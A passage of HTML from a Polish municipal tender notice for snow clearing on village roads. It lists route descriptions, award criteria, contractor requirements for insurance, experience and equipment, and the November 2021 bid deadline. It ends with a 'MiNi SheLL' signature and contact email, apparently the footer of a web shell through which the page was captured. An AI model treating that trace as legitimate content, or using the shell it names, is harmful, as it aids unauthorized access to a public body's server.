class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5. <br/>Odśnieżanie dróg we wsiach Karwów, Tudorów, Nikisiałka Mała, Nikisiałka Duża.<br/>Droga:<br/>- Karwów – droga od Włostowa przez Tudorów do Karwowa do drogi powiatowej i do <br/> „Źródełka”, <br/>- Tudorów- przez wieś do drogi powiatowej, droga Tudorów – Gaj, do posesji nr 19 i do <br/> posesji nr 27,<br/>- Nikisiałka Duża – od posesji nr 54 do posesji 65, w stronę Malic, w stronę Wąworkowa <br/> do ostatnich zabudowań.<br/>- Nikisiałka Mała – Dziury, od posesji nr 2 do posesji nr 3A, Nikisiałka Mała – „Ukraina”. <br/>Łączna długość dróg do odśnieżania wynosi w tej części 10,4km. <br/>Wykonawca przed przystąpieniem do przetargu musi zapoznać się z terenem – trasami dróg, ponieważ wiele odcinków dróg położonych jest w wąwozach , obok skarp i należy przewidzieć wywożenie śniegu z wąwozów lub usuwanie śniegu na odkład na skarpy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za czas reakcji na zgłoszenie poniżej 1h</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 6. <br/>Odśnieżanie dróg we wsiach Kornacice, Lipowa ,Podole, Rosochy.<br/>Droga:<br/>- Kornacice – od posesji nr 2 do posesji nr 12 , w stronę Lipowej , <br/>- Lipowa przez Wieś,<br/>- Podole od posesji nr 56 do posesji nr 60, od posesji nr 54 do posesji nr 55, w stronę <br/> Kornacic do posesji nr 66, od drogi powiatowej do posesji nr 38; od drogi powiatowej do <br/> posesji nr 12, od posesji nr 22 do posesji 27; od Podola obok Kościoła do Rosoch, <br/>- Rosochy przez wieś, od posesji nr 54 do posesji nr 69, w stronę Przeuszyna, i w stronę <br/> Kolonia Rosochy – Kaliszany, pod las. <br/>Łączna długość dróg do odśnieżania wynosi w tej części 11,50 km.<br/>Wykonawca przed przystąpieniem do przetargu musi zapoznać się z terenem – trasami dróg, ponieważ wiele odcinków dróg położonych jest w wąwozach , obok skarp i należy przewidzieć wywożenie śniegu z wąwozów lub usuwanie śniegu na odkład na skarpy. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">160 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Za czas reakcji na zgłoszenie poniżej 1h</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Wymagane jest posiadanie przez Wykonawcę, posiadania ubezpieczenia od <br/> odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z <br/> przedmiotem zamówienia na sumę gwarancyjną min. 50.000zł dla każdej z części <br/> osobno.<br/>Wiedza i doświadczenie Wykonawcy w realizacji, w okresie ostatnich trzech lat <br/> przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest <br/> krótszy w tym okresie, przynajmniej jednej usługi polegającej na odśnieżaniu dróg <br/> wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz <br/> których usługi zostały wykonane oraz załączeniem dowodów określających czy te <br/> usługi zostały wykonane należycie, przy czym dowodami, o których mowa są <br/> referencje bądź inne dokumenty wystawione przez podmiot na rzecz którego <br/> usługi były wykonywane<br/> Wykazać sprzęt min. 1 pojazd kołowy – ciągnik z dwoma napędami z pługiem <br/> odśnieżnym i łyżką otwartą z możliwością zmiany- przepięcia oraz urządzenie do <br/> posypywania dróg mieszanką uszorstniającą. Dla każdej części osobno. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu wykazania braku podstaw wykluczenia z postępowania o udzielnie <br/> zamówienia na podstawie okoliczności o których mowa w pkt 6.1 niniejszej SWZ<br/> należy na wezwanie Zamawiającego pod rygorem wykluczenia z postępowania, <br/> złożyć w wyznaczonym przez Zamawiającego terminie następujące środki dowodowe:<br/>a)	oświadczenie Wykonawcy w zakresie art.108.ust.1 pkt 5 ustawy o braku <br/> przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 <br/> lutego 2007 r o ochronie konkurencji i konsumentów (Dz.U. z 2020r poz.1076 i <br/> 1086) z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową albo <br/> oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami <br/> lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej <br/> niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej. <br/>7.3.W celu oceny spełnienia przez Wykonawcę warunków , o których mowa w pkt 5.2 <br/> ppkt c SWZ należy na wezwanie Zamawiającego pod rygorem wykluczenia<br/> z postępowania, złożyć w wyznaczonym przez Zamawiającego terminie <br/> następujące podmiotowe środki dowodowe;<br/> a)potwierdzające, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w <br/> zakresie prowadzonej działalności związanej z przedmiotem zamówienia ze <br/> wskazaniem sumy gwarancyjnej tego ubezpieczenia. .</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu oceny spełnienia przez Wykonawcę warunków, o których mowa w pkt 5.2, <br/> ppkt d SWZ, należy na wezwanie Zamawiającego, po rygorem wykluczenia<br/> z postępowania, złożyć w wyznaczonym przez Zamawiającego terminie <br/> następujące podmiotowe środki dowodowe :<br/> a) wykaz zrealizowanej, w okresie ostatnich trzech lat przed upływem terminu <br/> składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, <br/> przynajmniej jednej usługi polegającej na odśnieżaniu dróg wraz z podaniem ich <br/> wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały <br/> wykonane oraz załączeniem dowodów określających czy te usługi zostały <br/> wykonane należycie, przy czym dowodami, o których mowa są referencje bądź inne <br/> dokumenty wystawione przez podmiot na rzecz którego usługi były wykonywane<br/> b) wykaz sprzętu - min. 1 pojazd kołowy – ciągnik z dwoma napędami z pługiem <br/> odśnieżnym i łyżką otwartą z możliwością zmiany- przepięcia oraz urządzenie do <br/> posypywania dróg mieszanką uszorstniającą.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia , <br/> zobowiązani są oni wykazać spełnienie warunków udziału w postępowaniu wspólnie.<br/>5.9.W przypadku wspólnego ubiegania się o udzielenie zamówienia, wykonawcy <br/> ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie <br/> zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie <br/> zamówienia publicznego.<br/>5.10.Jeżeli zostanie wybrana jako najkorzystniejsza oferta wykonawców wspólnie <br/> ubiegających się o udzielenie zamówienia, zamawiający będzie żądał przed <br/> zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej <br/> współpracę tych wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Umowa w sprawie realizacji zamówienia publicznego zawarta zostanie z <br/> uwzględnieniem postanowień wynikających z treści niniejszej specyfikacji <br/> warunków zamówienia oraz danych zawartych w ofercie.<br/>16.2.Postanowienia istotne dla stron określa wzór umowy stanowiący integralną część <br/> SIWZ ( załącznik nr 7 do SIWZ ).<br/>16.3.Wszelkie zmiany i uzupełnienia treści umowy mogą być dokonywane wyłącznie w <br/> formie aneksu podpisanego przez obie strony. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://umopatow.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-04 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com